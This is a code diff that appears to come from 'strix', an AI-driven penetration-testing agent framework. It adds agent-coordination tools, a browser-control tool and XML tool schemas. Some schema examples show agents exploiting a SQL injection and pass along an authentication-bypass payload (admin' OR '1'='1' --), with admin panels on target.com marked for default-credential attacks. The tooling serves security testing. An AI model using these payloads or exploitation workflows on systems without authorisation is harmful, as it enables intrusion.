        _agent_messages[target_agent_id].append(message_data)
        _agent_graph["edges"].append(
            {
                "from": sender_id,
                "to": target_agent_id,
                "type": "message",
                "message_id": message_id,
                "message_type": message_type,
                "priority": priority,
                "created_at": datetime.now(UTC).isoformat(),
            }
        )
        message_data["delivered"] = True
        target_name = _agent_graph["nodes"][target_agent_id]["name"]
        sender_name = _agent_graph["nodes"][sender_id]["name"]
        return {
            "success": True,
            "message_id": message_id,
            "message": f"Message sent from '{sender_name}' to '{target_name}'",
            "delivery_status": "delivered",
            "target_agent": {
                "id": target_agent_id,
                "name": target_name,
                "status": _agent_graph["nodes"][target_agent_id]["status"],
            },
        }
    except Exception as e:  # noqa: BLE001
        return {"success": False, "error": f"Failed to send message: {e}", "message_id": None}
@register_tool(sandbox_execution=False)
 def agent_finish(
    agent_state: Any,
    result_summary: str,
    findings: list[str] | None = None,
    success: bool = True,
    report_to_parent: bool = True,
    final_recommendations: list[str] | None = None,
 ) -> dict[str, Any]:
    try:
        if not hasattr(agent_state, "parent_id") or agent_state.parent_id is None:
            return {
                "agent_completed": False,
                "error": (
                    "This tool can only be used by subagents. "
                    "Root/main agents must use finish_scan instead."
                ),
                "parent_notified": False,
            }
        agent_id = agent_state.agent_id
        if agent_id not in _agent_graph["nodes"]:
            return {"agent_completed": False, "error": "Current agent not found in graph"}
        agent_node = _agent_graph["nodes"][agent_id]
        agent_node["status"] = "finished" if success else "failed"
        agent_node["finished_at"] = datetime.now(UTC).isoformat()
        agent_node["result"] = {
            "summary": result_summary,
            "findings": findings or [],
            "success": success,
            "recommendations": final_recommendations or [],
        }
        parent_notified = False
        if report_to_parent and agent_node["parent_id"]:
            parent_id = agent_node["parent_id"]
            if parent_id in _agent_graph["nodes"]:
                findings_xml = "\n".join(
                    f"        <finding>{finding}</finding>" for finding in (findings or [])
                )
                recommendations_xml = "\n".join(
                    f"        <recommendation>{rec}</recommendation>"
                    for rec in (final_recommendations or [])
                )
                report_message = f"""<agent_completion_report>
    <agent_info>
        <agent_name>{agent_node["name"]}</agent_name>
        <agent_id>{agent_id}</agent_id>
        <task>{agent_node["task"]}</task>
        <status>{"SUCCESS" if success else "FAILED"}</status>
        <completion_time>{agent_node["finished_at"]}</completion_time>
    </agent_info>
    <results>
        <summary>{result_summary}</summary>
        <findings>
 {findings_xml}
        </findings>
        <recommendations>
 {recommendations_xml}
        </recommendations>
    </results>
 </agent_completion_report>"""
                if parent_id not in _agent_messages:
                    _agent_messages[parent_id] = []
                from uuid import uuid4
                _agent_messages[parent_id].append(
                    {
                        "id": f"report_{uuid4().hex[:8]}",
                        "from": agent_id,
                        "to": parent_id,
                        "content": report_message,
                        "message_type": "information",
                        "priority": "high",
                        "timestamp": datetime.now(UTC).isoformat(),
                        "delivered": True,
                        "read": False,
                    }
                )
                parent_notified = True
        _running_agents.pop(agent_id, None)
        return {
            "agent_completed": True,
            "parent_notified": parent_notified,
            "completion_summary": {
                "agent_id": agent_id,
                "agent_name": agent_node["name"],
                "task": agent_node["task"],
                "success": success,
                "findings_count": len(findings or []),
                "has_recommendations": bool(final_recommendations),
                "finished_at": agent_node["finished_at"],
            },
        }
    except Exception as e:  # noqa: BLE001
        return {
            "agent_completed": False,
            "error": f"Failed to complete agent: {e}",
            "parent_notified": False,
        }
 def stop_agent(agent_id: str) -> dict[str, Any]:
    try:
        if agent_id not in _agent_graph["nodes"]:
            return {
                "success": False,
                "error": f"Agent '{agent_id}' not found in graph",
                "agent_id": agent_id,
            }
        agent_node = _agent_graph["nodes"][agent_id]
        if agent_node["status"] in ["completed", "error", "failed", "stopped"]:
            return {
                "success": True,
                "message": f"Agent '{agent_node['name']}' was already stopped",
                "agent_id": agent_id,
                "previous_status": agent_node["status"],
            }
        if agent_id in _agent_states:
            agent_state = _agent_states[agent_id]
            agent_state.request_stop()
        if agent_id in _agent_instances:
            agent_instance = _agent_instances[agent_id]
            if hasattr(agent_instance, "state"):
                agent_instance.state.request_stop()
            if hasattr(agent_instance, "cancel_current_execution"):
                agent_instance.cancel_current_execution()
        agent_node["status"] = "stopping"
        try:
            from strix.cli.tracer import get_global_tracer
            tracer = get_global_tracer()
            if tracer:
                tracer.update_agent_status(agent_id, "stopping")
        except (ImportError, AttributeError):
            pass
        agent_node["result"] = {
            "summary": "Agent stop requested by user",
            "success": False,
            "stopped_by_user": True,
        }
        return {
            "success": True,
            "message": f"Stop request sent to agent '{agent_node['name']}'",
            "agent_id": agent_id,
            "agent_name": agent_node["name"],
            "note": "Agent will stop gracefully after current iteration",
        }
    except Exception as e:  # noqa: BLE001
        return {
            "success": False,
            "error": f"Failed to stop agent: {e}",
            "agent_id": agent_id,
        }
 def send_user_message_to_agent(agent_id: str, message: str) -> dict[str, Any]:
    try:
        if agent_id not in _agent_graph["nodes"]:
            return {
                "success": False,
                "error": f"Agent '{agent_id}' not found in graph",
                "agent_id": agent_id,
            }
        agent_node = _agent_graph["nodes"][agent_id]
        if agent_id not in _agent_messages:
            _agent_messages[agent_id] = []
        from uuid import uuid4
        message_data = {
            "id": f"user_msg_{uuid4().hex[:8]}",
            "from": "user",
            "to": agent_id,
            "content": message,
            "message_type": "instruction",
            "priority": "high",
            "timestamp": datetime.now(UTC).isoformat(),
            "delivered": True,
            "read": False,
        }
        _agent_messages[agent_id].append(message_data)
        return {
            "success": True,
            "message": f"Message sent to agent '{agent_node['name']}'",
            "agent_id": agent_id,
            "agent_name": agent_node["name"],
        }
    except Exception as e:  # noqa: BLE001
        return {
            "success": False,
            "error": f"Failed to send message to agent: {e}",
            "agent_id": agent_id,
        }
@register_tool(sandbox_execution=False)
 def wait_for_message(
    agent_state: Any,
    reason: str = "Waiting for messages from other agents or user input",
 ) -> dict[str, Any]:
    try:
        agent_id = agent_state.agent_id
        agent_name = agent_state.agent_name
        agent_state.enter_waiting_state()
        if agent_id in _agent_graph["nodes"]:
            _agent_graph["nodes"][agent_id]["status"] = "waiting"
            _agent_graph["nodes"][agent_id]["waiting_reason"] = reason
        try:
            from strix.cli.tracer import get_global_tracer
            tracer = get_global_tracer()
            if tracer:
                tracer.update_agent_status(agent_id, "waiting")
        except (ImportError, AttributeError):
            pass
    except Exception as e:  # noqa: BLE001
        return {"success": False, "error": f"Failed to enter waiting state: {e}", "status": "error"}
    else:
        return {
            "success": True,
            "status": "waiting",
            "message": f"Agent '{agent_name}' is now waiting for messages",
            "reason": reason,
            "agent_info": {
                "id": agent_id,
                "name": agent_name,
                "status": "waiting",
            },
            "resume_conditions": [
                "Message from another agent",
                "Message from user",
                "Direct communication",
            ],
        }
--- a/strix/tools/agents_graph/agents_graph_actions_schema.xml
+++ b/strix/tools/agents_graph/agents_graph_actions_schema.xml
@@ -0,0 +1,223 @@
 <tools>
  <tool name="agent_finish">
    <description>Mark a subagent's task as completed and optionally report results to parent agent.
 IMPORTANT: This tool can ONLY be used by subagents (agents with a parent).
 Root/main agents must use finish_scan instead.
 This tool should be called when a subagent completes its assigned subtask to:
 - Mark the subagent's task as completed
 - Report findings back to the parent agent
 Use this tool when:
 - You are a subagent working on a specific subtask
 - You have completed your assigned task
 - You want to report your findings to the parent agent
 - You are ready to terminate this subagent's execution</description>
    <details>This replaces the previous finish_scan tool and handles both sub-agent completion
  and main agent completion. When a sub-agent finishes, it can report its findings
  back to the parent agent for coordination.</details>
    <parameters>
      <parameter name="result_summary" type="string" required="true">
        <description>Summary of what the agent accomplished and discovered</description>
      </parameter>
      <parameter name="findings" type="string" required="false">
        <description>List of specific findings, vulnerabilities, or discoveries</description>
      </parameter>
      <parameter name="success" type="boolean" required="false">
        <description>Whether the agent's task completed successfully</description>
      </parameter>
      <parameter name="report_to_parent" type="boolean" required="false">
        <description>Whether to send results back to the parent agent</description>
      </parameter>
      <parameter name="final_recommendations" type="string" required="false">
        <description>Recommendations for next steps or follow-up actions</description>
      </parameter>
    </parameters>
    <returns type="Dict[str, Any]">
      <description>Response containing: - agent_completed: Whether the agent was marked as completed - parent_notified: Whether parent was notified (if applicable) - completion_summary: Summary of completion status</description>
    </returns>
    <examples>
  # Sub-agent completing subdomain enumeration task
  <function=agent_finish>
  <parameter=result_summary>Completed comprehensive subdomain enumeration for target.com.
              Discovered 47 subdomains including several interesting ones with admin/dev
              in the name. Found 3 subdomains with exposed services on non-standard
              ports.</parameter>
  <parameter=findings>["admin.target.com - exposed phpMyAdmin",
                "dev-api.target.com - unauth API endpoints",
                "staging.target.com - directory listing enabled",
                "mail.target.com - POP3/IMAP services"]</parameter>
  <parameter=success>true</parameter>
  <parameter=report_to_parent>true</parameter>
  <parameter=final_recommendations>["Prioritize testing admin.target.com for default creds",
                             "Enumerate dev-api.target.com API endpoints",
                             "Check staging.target.com for sensitive files"]</parameter>
  </function>
    </examples>
  </tool>
  <tool name="create_agent">
    <description>Create and spawn a new agent to handle a specific subtask.
 MANDATORY REQUIREMENT: You MUST call view_agent_graph FIRST before creating any new agent to check if there is already an agent working on the same or similar task. Only create a new agent if no existing agent is handling the specific task.</description>
    <details>The new agent inherits the parent's conversation history and context up to the point
  of creation, then continues with its assigned subtask. This enables decomposition
  of complex penetration testing tasks into specialized sub-agents.
  The agent runs asynchronously and independently, allowing the parent to continue
  immediately while the new agent executes its task in the background.
  CRITICAL: Before calling this tool, you MUST first use view_agent_graph to:
  - Examine all existing agents and their current tasks
  - Verify no agent is already working on the same or similar objective
  - Avoid duplication of effort and resource waste
  - Ensure efficient coordination across the multi-agent system
  If you as a parent agent don't absolutely have anything to do while your subagents are running, you can use wait_for_message tool. The subagent will continue to run in the background, and update you when it's done.
  </details>
    <parameters>
      <parameter name="task" type="string" required="true">
        <description>The specific task/objective for the new agent to accomplish</description>
      </parameter>
      <parameter name="name" type="string" required="true">
        <description>Human-readable name for the agent (for tracking purposes)</description>
      </parameter>
      <parameter name="inherit_context" type="boolean" required="false">
        <description>Whether the new agent should inherit parent's conversation history and context</description>
      </parameter>
      <parameter name="prompt_modules" type="string" required="false">
        <description>Comma-separated list of prompt modules to use for the agent. Most agents should have at least one module in order to be useful. {{DYNAMIC_MODULES_DESCRIPTION}}</description>
      </parameter>
    </parameters>
    <returns type="Dict[str, Any]">
      <description>Response containing: - agent_id: Unique identifier for the created agent - success: Whether the agent was created successfully - message: Status message - agent_info: Details about the created agent</description>
    </returns>
    <examples>
  # REQUIRED: First check agent graph before creating any new agent
  <function=view_agent_graph>
  </function>
  # REQUIRED: Check agent graph again before creating another agent
  <function=view_agent_graph>
  </function>
  # After confirming no SQL testing agent exists, create agent for vulnerability validation
  <function=create_agent>
  <parameter=task>Validate and exploit the suspected SQL injection vulnerability found in
              the login form. Confirm exploitability and document proof of concept.</parameter>
  <parameter=name>SQLi Validator</parameter>
  <parameter=prompt_modules>sql_injection</parameter>
  </function>
  # Create specialized authentication testing agent with multiple modules (comma-separated)
  <function=create_agent>
  <parameter=task>Test authentication mechanisms, JWT implementation, and session management
              for security vulnerabilities and bypass techniques.</parameter>
  <parameter=name>Auth Specialist</parameter>
  <parameter=prompt_modules>authentication_jwt, business_logic</parameter>
  </function>
    </examples>
  </tool>
  <tool name="send_message_to_agent">
    <description>Send a message to another agent in the graph for coordination and communication.</description>
    <details>This enables agents to communicate with each other during execution for:
  - Sharing discovered information or findings
  - Asking questions or requesting assistance
  - Providing instructions or coordination
  - Reporting status or results</details>
    <parameters>
      <parameter name="target_agent_id" type="string" required="true">
        <description>ID of the agent to send the message to</description>
      </parameter>
      <parameter name="message" type="string" required="true">
        <description>The message content to send</description>
      </parameter>
      <parameter name="message_type" type="string" required="false">
        <description>Type of message being sent: - "query": Question requiring a response - "instruction": Command or directive for the target agent - "information": Informational message (findings, status, etc.)</description>
      </parameter>
      <parameter name="priority" type="string" required="false">
        <description>Priority level of the message</description>
      </parameter>
    </parameters>
    <returns type="Dict[str, Any]">
      <description>Response containing: - success: Whether the message was sent successfully - message_id: Unique identifier for the message - delivery_status: Status of message delivery</description>
    </returns>
    <examples>
  # Share discovered vulnerability information
  <function=send_message_to_agent>
  <parameter=target_agent_id>agent_abc123</parameter>
  <parameter=message>Found SQL injection vulnerability in /login.php parameter 'username'.
              Payload: admin' OR '1'='1' -- successfully bypassed authentication.
              You should focus your testing on the authenticated areas of the
              application.</parameter>
  <parameter=message_type>information</parameter>
  <parameter=priority>high</parameter>
  </function>
  # Request assistance from specialist agent
  <function=send_message_to_agent>
  <parameter=target_agent_id>agent_def456</parameter>
  <parameter=message>I've identified what appears to be a custom encryption implementation
              in the API responses. Can you analyze the cryptographic strength and look
              for potential weaknesses?</parameter>
  <parameter=message_type>query</parameter>
  <parameter=priority>normal</parameter>
  </function>
    </examples>
  </tool>
  <tool name="view_agent_graph">
    <description>View the current agent graph showing all agents, their relationships, and status.</description>
    <details>This provides a comprehensive overview of the multi-agent system including:
  - All agent nodes with their tasks, status, and metadata
  - Parent-child relationships between agents
  - Message communication patterns
  - Current execution state</details>
    <returns type="Dict[str, Any]">
      <description>Response containing: - graph_structure: Human-readable representation of the agent graph - summary: High-level statistics about the graph</description>
    </returns>
  </tool>
  <tool name="wait_for_message">
    <description>Pause the agent loop indefinitely until receiving a message from another agent or user.
 This tool puts the agent into a waiting state where it remains idle until it receives any form of communication. The agent will automatically resume execution when a message arrives.
 IMPORTANT: This tool causes the agent to stop all activity until a message is received. Use it when you need to:
 - Wait for subagent completion reports
 - Coordinate with other agents before proceeding
 - Pause for user input or decisions
 - Synchronize multi-agent workflows
 NOTE: If you are waiting for an agent that is NOT your subagent, you first tell it to message you with updates before waiting for it. Otherwise, you will wait forever!
 </description>
    <details>When this tool is called, the agent enters a waiting state and will not continue execution until:
  - Another agent sends it a message via send_message_to_agent
  - A user sends it a direct message through the CLI
  - Any other form of inter-agent or user communication occurs
  The agent will automatically resume from where it left off once a message is received.
  This is particularly useful for parent agents waiting for subagent results or for coordination points in multi-agent workflows.</details>
    <parameters>
      <parameter name="reason" type="string" required="false">
        <description>Explanation for why the agent is waiting (for logging and monitoring purposes)</description>
      </parameter>
    </parameters>
    <returns type="Dict[str, Any]">
      <description>Response containing: - success: Whether the agent successfully entered waiting state - status: Current agent status ("waiting") - reason: The reason for waiting - agent_info: Details about the waiting agent - resume_conditions: List of conditions that will resume the agent</description>
    </returns>
    <examples>
  # Wait for subagents to complete their tasks
  <function=wait_for_message>
  <parameter=reason>Waiting for subdomain enumeration and port scanning subagents to complete their tasks and report findings</parameter>
  </function>
  # Wait for user input on next steps
  <function=wait_for_message>
  <parameter=reason>Waiting for user decision on whether to proceed with exploitation of discovered SQL injection vulnerability</parameter>
  </function>
  # Coordinate with other agents
  <function=wait_for_message>
  <parameter=reason>Waiting for vulnerability assessment agent to share discovered attack vectors before proceeding with exploitation phase</parameter>
  </function>
    </examples>
  </tool>
 </tools>
--- a/strix/tools/argument_parser.py
+++ b/strix/tools/argument_parser.py
@@ -0,0 +1,120 @@
 import contextlib
 import inspect
 import json
 from collections.abc import Callable
 from typing import Any, Union, get_args, get_origin
 class ArgumentConversionError(Exception):
    def __init__(self, message: str, param_name: str | None = None) -> None:
        self.param_name = param_name
        super().__init__(message)
 def convert_arguments(func: Callable[..., Any], kwargs: dict[str, Any]) -> dict[str, Any]:
    try:
        sig = inspect.signature(func)
        converted = {}
        for param_name, value in kwargs.items():
            if param_name not in sig.parameters:
                converted[param_name] = value
                continue
            param = sig.parameters[param_name]
            param_type = param.annotation
            if param_type == inspect.Parameter.empty or value is None:
                converted[param_name] = value
                continue
            if not isinstance(value, str):
                converted[param_name] = value
                continue
            try:
                converted[param_name] = convert_string_to_type(value, param_type)
            except (ValueError, TypeError, json.JSONDecodeError) as e:
                raise ArgumentConversionError(
                    f"Failed to convert argument '{param_name}' to type {param_type}: {e}",
                    param_name=param_name,
                ) from e
    except (ValueError, TypeError, AttributeError) as e:
        raise ArgumentConversionError(f"Failed to process function arguments: {e}") from e
    return converted
 def convert_string_to_type(value: str, param_type: Any) -> Any:
    origin = get_origin(param_type)
    if origin is Union or origin is type(str | None):
        args = get_args(param_type)
        for arg_type in args:
            if arg_type is not type(None):
                with contextlib.suppress(ValueError, TypeError, json.JSONDecodeError):
                    return convert_string_to_type(value, arg_type)
        return value
    if hasattr(param_type, "__args__"):
        args = getattr(param_type, "__args__", ())
        if len(args) == 2 and type(None) in args:
            non_none_type = args[0] if args[1] is type(None) else args[1]
            with contextlib.suppress(ValueError, TypeError, json.JSONDecodeError):
                return convert_string_to_type(value, non_none_type)
            return value
    return _convert_basic_types(value, param_type, origin)
 def _convert_basic_types(value: str, param_type: Any, origin: Any = None) -> Any:
    basic_type_converters: dict[Any, Callable[[str], Any]] = {
        int: int,
        float: float,
        bool: _convert_to_bool,
        str: str,
    }
    if param_type in basic_type_converters:
        return basic_type_converters[param_type](value)
    if list in (origin, param_type):
        return _convert_to_list(value)
    if dict in (origin, param_type):
        return _convert_to_dict(value)
    with contextlib.suppress(json.JSONDecodeError):
        return json.loads(value)
    return value
 def _convert_to_bool(value: str) -> bool:
    if value.lower() in ("true", "1", "yes", "on"):
        return True
    if value.lower() in ("false", "0", "no", "off"):
        return False
    return bool(value)
 def _convert_to_list(value: str) -> list[Any]:
    try:
        parsed = json.loads(value)
        if isinstance(parsed, list):
            return parsed
    except json.JSONDecodeError:
        if "," in value:
            return [item.strip() for item in value.split(",")]
        return [value]
    else:
        return [parsed]
 def _convert_to_dict(value: str) -> dict[str, Any]:
    try:
        parsed = json.loads(value)
        if isinstance(parsed, dict):
            return parsed
    except json.JSONDecodeError:
        return {}
    else:
        return {}
--- a/strix/tools/browser/init.py
+++ b/strix/tools/browser/init.py
@@ -0,0 +1,4 @@
 from .browser_actions import browser_action
 __all__ = ["browser_action"]
--- a/strix/tools/browser/browser_actions.py
+++ b/strix/tools/browser/browser_actions.py
@@ -0,0 +1,236 @@
 from typing import Any, Literal, NoReturn
 from strix.tools.registry import register_tool
 from .tab_manager import BrowserTabManager, get_browser_tab_manager
 BrowserAction = Literal[
    "launch",
    "goto",
    "click",
    "type",
    "scroll_down",
    "scroll_up",
    "back",
    "forward",
    "new_tab",
    "switch_tab",
    "close_tab",
    "wait",
    "execute_js",
    "double_click",
    "hover",
    "press_key",
    "save_pdf",
    "get_console_logs",
    "view_source",
    "close",
    "list_tabs",
 ]
 def _validate_url(action_name: str, url: str | None) -> None:
    if not url:
        raise ValueError(f"url parameter is required for {action_name} action")
 def _validate_coordinate(action_name: str, coordinate: str | None) -> None:
    if not coordinate:
        raise ValueError(f"coordinate parameter is required for {action_name} action")
 def _validate_text(action_name: str, text: str | None) -> None:
    if not text:
        raise ValueError(f"text parameter is required for {action_name} action")
 def _validate_tab_id(action_name: str, tab_id: str | None) -> None:
    if not tab_id:
        raise ValueError(f"tab_id parameter is required for {action_name} action")
 def _validate_js_code(action_name: str, js_code: str | None) -> None:
    if not js_code:
        raise ValueError(f"js_code parameter is required for {action_name} action")
 def _validate_duration(action_name: str, duration: float | None) -> None:
    if duration is None:
        raise ValueError(f"duration parameter is required for {action_name} action")
 def _validate_key(action_name: str, key: str | None) -> None:
    if not key:
        raise ValueError(f"key parameter is required for {action_name} action")
 def _validate_file_path(action_name: str, file_path: str | None) -> None:
    if not file_path:
        raise ValueError(f"file_path parameter is required for {action_name} action")
 def _handle_navigation_actions(
    manager: BrowserTabManager,
    action: str,
    url: str | None = None,
    tab_id: str | None = None,
 ) -> dict[str, Any]:
    if action == "launch":
        return manager.launch_browser(url)
    if action == "goto":
        _validate_url(action, url)
        assert url is not None
        return manager.goto_url(url, tab_id)
    if action == "back":
        return manager.back(tab_id)
    if action == "forward":
        return manager.forward(tab_id)
    raise ValueError(f"Unknown navigation action: {action}")
 def _handle_interaction_actions(
    manager: BrowserTabManager,
    action: str,
    coordinate: str | None = None,
    text: str | None = None,
    key: str | None = None,
    tab_id: str | None = None,
 ) -> dict[str, Any]:
    if action in {"click", "double_click", "hover"}:
        _validate_coordinate(action, coordinate)
        assert coordinate is not None
        action_map = {
            "click": manager.click,
            "double_click": manager.double_click,
            "hover": manager.hover,
        }
        return action_map[action](coordinate, tab_id)
    if action in {"scroll_down", "scroll_up"}:
        direction = "down" if action == "scroll_down" else "up"
        return manager.scroll(direction, tab_id)
    if action == "type":
        _validate_text(action, text)
        assert text is not None
        return manager.type_text(text, tab_id)
    if action == "press_key":
        _validate_key(action, key)
        assert key is not None
        return manager.press_key(key, tab_id)
    raise ValueError(f"Unknown interaction action: {action}")
 def _raise_unknown_action(action: str) -> NoReturn:
    raise ValueError(f"Unknown action: {action}")
 def _handle_tab_actions(
    manager: BrowserTabManager,
    action: str,
    url: str | None = None,
    tab_id: str | None = None,
 ) -> dict[str, Any]:
    if action == "new_tab":
        return manager.new_tab(url)
    if action == "switch_tab":
        _validate_tab_id(action, tab_id)
        assert tab_id is not None
        return manager.switch_tab(tab_id)
    if action == "close_tab":
        _validate_tab_id(action, tab_id)
        assert tab_id is not None
        return manager.close_tab(tab_id)
    if action == "list_tabs":
        return manager.list_tabs()
    raise ValueError(f"Unknown tab action: {action}")
 def _handle_utility_actions(
    manager: BrowserTabManager,
    action: str,
    duration: float | None = None,
    js_code: str | None = None,
    file_path: str | None = None,
    tab_id: str | None = None,
    clear: bool = False,
 ) -> dict[str, Any]:
    if action == "wait":
        _validate_duration(action, duration)
        assert duration is not None
        return manager.wait_browser(duration, tab_id)
    if action == "execute_js":
        _validate_js_code(action, js_code)
        assert js_code is not None
        return manager.execute_js(js_code, tab_id)
    if action == "save_pdf":
        _validate_file_path(action, file_path)
        assert file_path is not None
        return manager.save_pdf(file_path, tab_id)
    if action == "get_console_logs":
        return manager.get_console_logs(tab_id, clear)
    if action == "view_source":
        return manager.view_source(tab_id)
    if action == "close":
        return manager.close_browser()
    raise ValueError(f"Unknown utility action: {action}")
@register_tool
 def browser_action(
    action: BrowserAction,
    url: str | None = None,
    coordinate: str | None = None,
    text: str | None = None,
    tab_id: str | None = None,
    js_code: str | None = None,
    duration: float | None = None,
    key: str | None = None,
    file_path: str | None = None,
    clear: bool = False,
 ) -> dict[str, Any]:
    manager = get_browser_tab_manager()
    try:
        navigation_actions = {"launch", "goto", "back", "forward"}
        interaction_actions = {
            "click",
            "type",
            "double_click",
            "hover",
            "press_key",
            "scroll_down",
            "scroll_up",
        }
        tab_actions = {"new_tab", "switch_tab", "close_tab", "list_tabs"}
        utility_actions = {
            "wait",
            "execute_js",
            "save_pdf",
            "get_console_logs",
            "view_source",
            "close",
        }
        if action in navigation_actions:
            return _handle_navigation_actions(manager, action, url, tab_id)
        if action in interaction_actions:
            return _handle_interaction_actions(manager, action, coordinate, text, key, tab_id)
        if action in tab_actions:
            return _handle_tab_actions(manager, action, url, tab_id)
        if action in utility_actions:
            return _handle_utility_actions(
                manager, action, duration, js_code, file_path, tab_id, clear
            )
        _raise_unknown_action(action)
    except (ValueError, RuntimeError) as e:
        return {
            "error": str(e),
            "tab_id": tab_id,
            "screenshot": "",
            "is_running": False,
        }
--- a/strix/tools/browser/browser_actions_schema.xml
+++ b/strix/tools/browser/browser_actions_schema.xml
@@ -0,0 +1,183 @@
 <?xml version="1.0" ?>
 <tools>
  <tool name="browser_action">
    <description>Perform browser actions using a Playwright-controlled browser with multiple tabs.
  The browser is PERSISTENT and remains active until explicitly closed, allowing for
  multi-step workflows and long-running processes across multiple tabs.</description>
    <parameters>
      <parameter name="action" type="string" required="true">
      </parameter>
      <parameter name="url" type="string" required="false">
        <description>Required for 'launch', 'goto', and optionally for 'new_tab' actions. The URL to launch the browser at, navigate to, or load in new tab. Must include appropriate protocol (e.g., http://, https://, file://).</description>
      </parameter>
      <parameter name="coordinate" type="string" required="false">
        <description>Required for 'click', 'double_click', and 'hover' actions. Format: "x,y" (e.g., "432,321"). Coordinates should target the center of elements (buttons, links, etc.). Must be within the browser viewport resolution. Be very careful to calculate the coordinates correctly based on the previous screenshot.</description>
      </parameter>
      <parameter name="text" type="string" required="false">
        <description>Required for 'type' action. The text to type in the field.</description>
      </parameter>
      <parameter name="tab_id" type="string" required="false">
        <description>Required for 'switch_tab' and 'close_tab' actions. Optional for other actions to specify which tab to operate on. The ID of the tab to operate on. The first tab created during 'launch' has ID "tab_1". If not provided, actions will operate on the currently active tab.</description>
      </parameter>
      <parameter name="js_code" type="string" required="false">
        <description>Required for 'execute_js' action. JavaScript code to execute in the page context. The code runs in the context of the current page and has access to the DOM and all page-defined variables and functions. The last evaluated expression's value is returned in the response.</description>
      </parameter>
      <parameter name="duration" type="string" required="false">
        <description>Required for 'wait' action. Number of seconds to pause execution. Can be fractional (e.g., 0.5 for half a second).</description>
      </parameter>
      <parameter name="key" type="string" required="false">
        <description>Required for 'press_key' action. The key to press. Valid values include: - Single characters: 'a'-'z', 'A'-'Z', '0'-'9' - Special keys: 'Enter', 'Escape', 'ArrowLeft', 'ArrowRight', etc. - Modifier keys: 'Shift', 'Control', 'Alt', 'Meta' - Function keys: 'F1'-'F12'</description>
      </parameter>
      <parameter name="file_path" type="string" required="false">
        <description>Required for 'save_pdf' action. The file path where to save the PDF.</description>
      </parameter>
      <parameter name="clear" type="boolean" required="false">
        <description>For 'get_console_logs' action: whether to clear console logs after retrieving them. Default is False (keep logs).</description>
      </parameter>
    </parameters>
    <returns type="Dict[str, Any]">
      <description>Response containing: - screenshot: Base64 encoded PNG of the current page state - url: Current page URL - title: Current page title - viewport: Current browser viewport dimensions - tab_id: ID of the current active tab - all_tabs: Dict of all open tab IDs and their URLs - message: Status message about the action performed - js_result: Result of JavaScript execution (for execute_js action) - pdf_saved: File path of saved PDF (for save_pdf action) - console_logs: Array of console messages (for get_console_logs action)   Limited to 50KB total and 200 most recent logs. Individual messages truncated at 1KB. - page_source: HTML source code (for view_source action)   Large pages are truncated to 100KB (keeping beginning and end sections).</description>
    </returns>
    <notes>
  Important usage rules:
  1. PERSISTENCE: The browser remains active and maintains its state until
     explicitly closed with the 'close' action. This allows for multi-step workflows
     across multiple tool calls and tabs.
  2. Browser interaction MUST start with 'launch' and end with 'close'.
  3. Only one action can be performed per call.
  4. To visit a new URL not reachable from current page, either:
     - Use 'goto' action
     - Open a new tab with the URL
     - Close browser and relaunch
  5. Click coordinates must be derived from the most recent screenshot.
  6. You MUST click on the center of the element, not the edge. You MUST calculate
     the coordinates correctly based on the previous screenshot, otherwise the click
     will fail. After clicking, check the new screenshot to verify the click was
     successful.
  7. Tab management:
     - First tab from 'launch' is "tab_1"
     - New tabs are numbered sequentially ("tab_2", "tab_3", etc.)
     - Must have at least one tab open at all times
     - Actions affect the currently active tab unless tab_id is specified
  8. JavaScript execution (following Playwright evaluation patterns):
     - Code runs in the browser page context, not the tool context
     - Has access to DOM (document, window, etc.) and page variables/functions
     - The LAST EVALUATED EXPRESSION is automatically returned - no return statement needed
     - For simple values: document.title (returns the title)
     - For objects: {title: document.title, url: location.href} (returns the object)
     - For async operations: Use await and the promise result will be returned
     - AVOID explicit return statements - they can break evaluation
     - object literals must be wrapped in paranthesis when they are the final expression
     - Variables from tool context are NOT available - pass data as parameters if needed
     - Examples of correct patterns:
       * Single value: document.querySelectorAll('img').length
       * Object result: {images: document.images.length, links: document.links.length}
       * Async operation: await fetch(location.href).then(r => r.status)
       * DOM manipulation: document.body.style.backgroundColor = 'red'; 'background changed'
  9. Wait action:
     - Time is specified in seconds
     - Can be used to wait for page loads, animations, etc.
     - Can be fractional (e.g., 0.5 seconds)
     - Screenshot is captured after the wait
  10. The browser can operate concurrently with other tools. You may invoke
      terminal, python, or other tools (in separate assistant messages) while maintaining
      the active browser session, enabling sophisticated multi-tool workflows.
  11. Keyboard actions:
      - Use press_key for individual key presses
      - Use type for typing regular text
      - Some keys have special names based on Playwright's key documentation
  12. All code in the js_code parameter is executed as-is - there's no need to
      escape special characters or worry about formatting. Just write your JavaScript
      code normally. It can be single line or multi-line.
  13. For form filling, click on the field first, then use 'type' to enter text.
  14. The browser runs in headless mode using Chrome engine for security and performance.
    </notes>
    <examples>
  # Launch browser at URL (creates tab_1)
  <function=browser_action>
  <parameter=action>launch</parameter>
  <parameter=url>https://example.com</parameter>
  </function>
  # Navigate to different URL
  <function=browser_action>
  <parameter=action>goto</parameter>
  <parameter=url>https://github.com</parameter>
  </function>
  # Open new tab with different URL
  <function=browser_action>
  <parameter=action>new_tab</parameter>
  <parameter=url>https://another-site.com</parameter>
  </function>
  # Wait for page load
  <function=browser_action>
  <parameter=action>wait</parameter>
  <parameter=duration>2.5</parameter>
  </function>
  # Click login button at coordinates from screenshot
  <function=browser_action>
  <parameter=action>click</parameter>
  <parameter=coordinate>450,300</parameter>
  </function>
  # Click username field and type
  <function=browser_action>
  <parameter=action>click</parameter>
  <parameter=coordinate>400,200</parameter>
  </function>
  <function=browser_action>
  <parameter=action>type</parameter>
  <parameter=text>user@example.com</parameter>
  </function>
  # Click password field and type
  <function=browser_action>
  <parameter=action>click</parameter>
  <parameter=coordinate>400,250</parameter>
  </function>
  <function=browser_action>
  <parameter=action>type</parameter>
  <parameter=text>mypassword123</parameter>
  </function>
  # Press Enter key
  <function=browser_action>
  <parameter=action>press_key</parameter>
  <parameter=key>Enter</parameter>
  </function>
  # Execute JavaScript to get page stats (correct pattern - no return statement)
  <function=browser_action>
  <parameter=action>execute_js</parameter>
  <parameter=js_code>const images = document.querySelectorAll('img');
 const links = document.querySelectorAll('a');
 {
    images: images.length,
    links: links.length,
    title: document.title
 }</parameter>
  </function>
  # Scroll down
  <function=browser_action>
  <parameter=action>scroll_down</parameter>
  </function>
  # Get console logs
  <function=browser_action>
  <parameter=action>get_console_logs</parameter>
  </function>
  # View page source
  <function=browser_action>
  <parameter=action>view_source</parameter>
  </function>
    </examples>
  </tool>
 </tools>
--- a/strix/tools/browser/browser_instance.py
+++ b/strix/tools/browser/browser_instance.py
@@ -0,0 +1,533 @@
